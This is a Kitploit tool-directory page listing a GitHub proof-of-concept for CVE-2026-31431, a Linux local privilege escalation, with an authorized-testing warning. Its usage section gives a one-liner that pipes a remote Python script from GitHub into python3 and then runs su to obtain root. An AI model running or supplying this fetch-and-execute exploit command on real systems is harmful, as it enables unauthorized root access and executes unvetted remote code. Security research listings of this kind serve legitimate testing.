Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-31431 — Proof-of-concept exploit for CVE-2026-31431, a Linux local privilege escalation vulnerability, demonstrating kernel exploitation for educational and authorized security testing. | Kitploit
Tools/GitHubGitHub/alihzsec/cve-2026-31431
Privilege EscalationExploit FrameworksVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHubalihzsec/cve-2026-31431

CVE-2026-31431

Proof-of-concept exploit for CVE-2026-31431, a Linux local privilege escalation vulnerability, demonstrating kernel exploitation for educational and authorized security testing.

View Repository
7664 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-31431 Proof of Concept (PoC)

This repository contains a Proof of Concept (PoC) exploit for CVE-2026-31431, demonstrating a local privilege escalation vulnerability.


[!WARNING] This project is intended strictly for educational and security research purposes only.
Use it only on systems you own or systems where you have explicit written authorization to test.
Unauthorized use may be illegal and is strongly discouraged.


Usage

Just Run :

root@kitploit:~
curl -s https://raw.githubusercontent.com/AliHzSec/CVE-2026-31431/refs/heads/master/main.py | python3 && su

Happy Hacking :)

Download Tool